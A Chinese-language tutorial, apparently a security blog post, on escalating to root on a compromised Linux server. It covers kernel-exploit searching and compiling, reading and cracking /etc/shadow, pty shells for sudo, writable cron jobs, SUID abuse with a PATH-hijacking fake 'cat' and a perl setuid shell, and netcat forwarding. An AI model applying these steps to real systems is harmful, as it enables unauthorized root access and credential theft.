日站就要日個徹底。往往我們能拿下服務(wù)器的web服務(wù)，卻被更新地比西方記者還快的管理員把內(nèi)網(wǎng)滲透的種子扼殺在提權(quán)的萌芽里面。Linux系統(tǒng)的提權(quán)過程不止涉及到了漏洞，也涉及了很多系統(tǒng)配置。一下是我總結(jié)的一些提權(quán)方法。

幾點前提

• 已經(jīng)拿到低權(quán)shell
• 被入侵的機(jī)器上面有nc，python，perl等linux非常常見的工具
• 有權(quán)限上傳文件和下載文件

內(nèi)核漏洞提權(quán)

提到臟牛，運維流下兩行眼淚，我們留下兩行鼻血。內(nèi)核漏洞是我們幾乎最先想到的提權(quán)方法。通殺的內(nèi)核漏洞是十分少見的，因而我們應(yīng)該先對系統(tǒng)相關(guān)的信息進(jìn)行收集。

查看發(fā)行版

cat /etc/issue  
cat /etc/*-release 

查看內(nèi)核版本

uname -a 

這里我找了臺機(jī)器測試：

#uname -a  
Linux xxxxx 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux#cat /etc/*-release  
DISTRIB_ID=UbuntuDISTRIB_RELEASE=10.04  
DISTRIB_CODENAME=lucid  
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS" 

這樣，我們就得到了系統(tǒng)的內(nèi)核版本(2.6.32-21 pae)，cpu架構(gòu)(i686)，和發(fā)行版(ubuntu 10.04)

可以開始搜索了

大多內(nèi)核漏洞通過內(nèi)核版本能很快查到

用kali自帶的searchsploit來搜索exploitdb中的漏洞利用代碼

searchspoit linux 2.6 ubuntu priv esc 

結(jié)果:

這么多，我們加入系統(tǒng)信息縮小范圍

searchsploit linux priv esc 2.6 ubuntu 10 

這樣可選的exp就少多了，很無奈，我們需要漫長的 點開exp看具體要求 的篩選過程，大部分exp都會寫清生效條件。因此我們能夠雖然很氣，但也很快地去掉一些不具備利用條件的exp。比如第三個exp針對一個特別的磁盤格式，排除。

經(jīng)過艱難的尋找，發(fā)現(xiàn)15704,c很順眼，于是把源代碼上傳，然后：

#gcc exp.c  
#lsexp.c  
a.out#./a.out  
id  
uid=0(root) gid=0(root) 

我們先編譯exp再執(zhí)行?？梢钥吹絜xp執(zhí)行以后沒輸出，但是我們其實已經(jīng)得到rootshell了(exp執(zhí)行以后 一定敲個命令 ，不然都不知道是成功了還是卡了)

exploitdb的搜索過程雖然繁瑣，但是能基本保證不會遺漏漏洞。如果想先偷懶圖個快的話，我們可以試試 https://www.kernel-exploits.com/ ，這里的exp已經(jīng)按照內(nèi)核版本分類了，而且有很多已經(jīng)完成了編譯。

比如我們搜索2.6.32：

這個rds的binary剛巧能用。“我收集信息了，我上傳exp了，我就root了。“

當(dāng)然，以上只是非常理想的情況，我們經(jīng)常會遇到?jīng)]有g(shù)cc的坑爹服務(wù)器。這時我們就需要在本地編譯。本地編譯時不止要 看exp源碼注釋的編譯參數(shù) ，也需要手動調(diào)整一下編譯的參數(shù)，比如給gcc 加-m 32來編譯32位。編譯問題繁多，有困難找谷歌，不再贅述。

當(dāng)內(nèi)核版本沒有好用的exp對應(yīng)的時候，可以檢查磁盤格式:

cat /etc/fstab 

和已經(jīng)安裝的程序:

dpkg -l  
rpm -qa 

然后進(jìn)行剛剛繁瑣的搜索，沒準(zhǔn)就找到個bug

最后強(qiáng)調(diào)利用內(nèi)核漏洞的幾個注意點：

1. 讀源碼 ，不然可能連編譯都不會
2. 讀源碼 ，不然費勁編譯完才發(fā)現(xiàn)不適用
3. 讀源碼 ，不然遇到一個刪全盤的”exp“怎么辦

明文root密碼提權(quán)

passwd和shadow

雖然遇到的概率很小，但還是提一下

大多l(xiāng)inux系統(tǒng)的密碼都和/etc/passwd和/etc/shadow這兩個配置文件息息相關(guān)。passwd里面儲存了用戶，shadow里面是密碼的hash。出于安全考慮passwd是全用戶可讀，root可寫的。shadow是僅root可讀寫的。

這里是一個典型的passwd文件

root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
ibuuid:x:100:101::/var/lib/libuuid:/bin/sh  
syslog:x:101:103::/home/syslog:/bin/false 
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin 

passwd由冒號分割，第一列是用戶名，第二列是密碼，x代表密碼hash被放在shadow里面了(這樣非root就看不到了)。而shadow里面最重要的就是密碼的hash

root:$6$URgq7sJf$4x8e9ntqTwAPIubi9YLxLQ2mZTTZKnGz0g/wWzOdPB5eGuz.S5iRtFdvfFd9VIVEWouiodB/hh9BYOLgAD8u5/:16902:0:99999:7:::  
daemon:*:15730:0:99999:7:::  
bin:*:15730:0:99999:7:::  
sys:*:15730:0:99999:7:::  
sync:*:15730:0:99999:7:::  
games:*:15730:0:99999:7:::  
man:*:15730:0:99999:7:::  
lp:*:15730:0:99999:7:::  
mail:*:15730:0:99999:7:::  
news:*:15730:0:99999:7:::  
uucp:*:15730:0:99999:7:::  
proxy:*:15730:0:99999:7:::  
www-data:*:15730:0:99999:7:::  
backup:*:15730:0:99999:7:::  
list:*:15730:0:99999:7:::  
irc:*:15730:0:99999:7:::  
gnats:*:15730:0:99999:7:::  
nobody:*:15730:0:99999:7:::  
libuuid:!:15730:0:99999:7:::  
syslog:*:15730:0:99999:7:::  
mysql:!:15730:0:99999:7:::  
dovecot:*:15730:0:99999:7:::  
sshd:*:15730:0:99999:7:::  
postfix:*:15730:0:99999:7:::  
shell命令來檢查權(quán)限  
cd /etc  
ls -l passwd shadow 

如果passwd可寫，我們就可以把root的密碼字段(x)替換成一個已知密碼的hash(比如本機(jī)shadow里面的root密碼hash)，這樣系統(tǒng)在驗證密碼時以passwd的為準(zhǔn)，密碼就已知了。如果shadow可讀，我們可以讀走root的hash，然后用hashcat或者john暴力破解之。

密碼復(fù)用

很多管理員會重復(fù)使用密碼，因此數(shù)據(jù)庫或者web后臺的密碼也許就是root密碼。

and then?

有了(疑似)root密碼怎么辦?你一定想ssh登陸。然而ssh很可能禁止root登陸，或是防火墻規(guī)則將你排除在外了。返回來想，我們不是有一個低權(quán)shell了嗎?找個辦法再上面“輸入”密碼就好了。顯然，直接在低權(quán)shell里面用sudo是不奏效的。這是因為出于安全考慮，linux要求用戶必須從 終端設(shè)備 (tty)中輸入密碼，而不是標(biāo)準(zhǔn)輸入(stdin)。換句話說，sudo在你輸入密碼的時候本質(zhì)上是讀取了鍵盤，而不是bash里面輸入的字符。因此為了能夠輸入密碼，我們必須模擬一個終端設(shè)備。python就有這樣的功能。在shell里面輸入：

python -c 'import pty;pty.spawn("/bin/sh")'  
就用python簡歷了一個虛擬終端，然后就可以使用sudo等等命令了。  
python -c 'import pty;pty.spawn("/bin/sh")'  
$ sudo su  
sudo su  
[sudo] password for www-data: 123456  
Sorry, try again.  
[sudo] password for www-data: 

計劃任務(wù)

系統(tǒng)內(nèi)可能會有一些定時執(zhí)行的任務(wù)，一般這些任務(wù)由crontab來管理，具有所屬用戶的權(quán)限。非root權(quán)限的用戶是不可以列出root用戶的計劃任務(wù)的。但是/etc/內(nèi)系統(tǒng)的計劃任務(wù)可以被列出

ls -l /etc/cron* 

默認(rèn)這些程序以root權(quán)限執(zhí)行，如果有幸遇到一個把其中腳本配置成任意用戶可寫的管理員，我們就可以修改腳本等回連rootshell了。

SUID

SUID是一種特殊的文件屬性，它允許用戶執(zhí)行的文件以該文件的擁有者的身份運行。比如passwd命令，就是以root權(quán)限運行來修改shadow的。

這里我們做個實驗(環(huán)境為ubuntu 16.04)：

c源代碼

#include  
#include  
int main()  
{  
setuid(0);//run as root  
system("id");  
system("cat /etc/shadow");  
} 

以root進(jìn)行編譯和權(quán)限設(shè)置

gcc suid.c -o suid-exp  
chmod 4755 ./suid-exp#這里設(shè)置了SUID位  
ls -l 

輸出

-rwsr-xr-x 1 root root 8632 Mar 15 20:53 suid-exp 

注意s屬性，表示這個程序有SUID的屬性。

接下來我們切換用戶并執(zhí)行

su test  
./suid-exp 

可以看到程序?qū)嶋H上已經(jīng)提升到了root權(quán)限。

SUID程序經(jīng)常存在提權(quán)漏洞，比如nmap就曾出現(xiàn)過提權(quán)漏洞。低權(quán)用戶通過打開nmap交互模式以root執(zhí)行任意系統(tǒng)命令。而除了借助程序功能提權(quán)，我們還可以嘗試劫持環(huán)境變量提權(quán)。上文的c程序使用了system函數(shù)，system函數(shù)是繼承環(huán)境變量的，因此我們通過替換環(huán)境變量可以達(dá)到執(zhí)行任意命令的效果。

我們進(jìn)入test低權(quán)用戶的shell

cat >> /tmp/cat <  
#!/usr/bin/python  
print "this is not the true cat"  
print "here is a root shell!"  
import pty;pty.spawn("/bin/sh")  
EOF  
# 這里我們在/tmp建立了假的cat，它會用python執(zhí)行一個shell  
PATH=/tmp:$PATH#設(shè)置PATH，優(yōu)先從/tmp查找程序  
./suid-exp#執(zhí)行suid程序，因為PATH被劫持，system("cat /etc/shadow");會執(zhí)行我們的假cat 

運行結(jié)果

還有一種情況：管理員配置錯誤，把不帶setuid(0);代碼的程序配置了SUID。當(dāng)這些程序被劫持的時候，我們需要自己的程序中使用setuid(0);來提權(quán)到root。這里有一個小技巧，我們用perl腳本來setuid：

#!/usr/bin/perl  
$< = $>;  
$( = $) = 0;  
system ("/bin/sh"): 

用這個簡單的腳本劫持，就把shell運行在root權(quán)限下了。

網(wǎng)絡(luò)與隱藏的服務(wù)

有一些服務(wù)器的服務(wù)會被配置成對內(nèi)網(wǎng)或者對本機(jī)開放。通過對他們的攻擊我們有機(jī)會接觸更多的敏感文件，或是運氣足夠好碰上一個遠(yuǎn)程root漏洞。

netstat -antup#查看各種網(wǎng)絡(luò)服務(wù) 

如果找到些神秘的服務(wù)，可以用netcat做個轉(zhuǎn)發(fā)

mkfifo backpipe  
nc -l 8082 0backpipe 

之后找漏洞，攻擊，從頭再來。

相關(guān)工具

提了那么配置錯誤的利用，卻沒說怎么找這些錯誤

分享兩個腳本：

unix-privesc-check： http://pentestmonkey.net/tools/audit/unix-privesc-check

linuxprivchecker： https://www.securitysift.com/download/linuxprivchecker.py

這兩個程序不止細(xì)致地檢查了非常多的配置問題，更讓人感動地列出了所有可寫文件?；旧峡梢哉f他們的檢查是足夠全面的。

當(dāng)然如果希望手動檢查還是推薦 https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

總結(jié)

Linux提權(quán)花樣非常多，涉及的技術(shù)五花八門。寫這篇文章的時候總想把相關(guān)知識都解釋清楚，但是面對系統(tǒng)繁瑣的工作過程和眾多的發(fā)行版深感自己理解之淺。我很贊同在很多論壇上看到的對于linux提權(quán)的提示：你需要知道linux系統(tǒng)的工作方式。各種奇技淫巧或是無比腦殘的錯誤最終都回歸到了系統(tǒng)的運行流程和權(quán)限管理機(jī)制上面?；貧w本質(zhì)，系統(tǒng)地了解系統(tǒng)才是保證安全的最佳方式。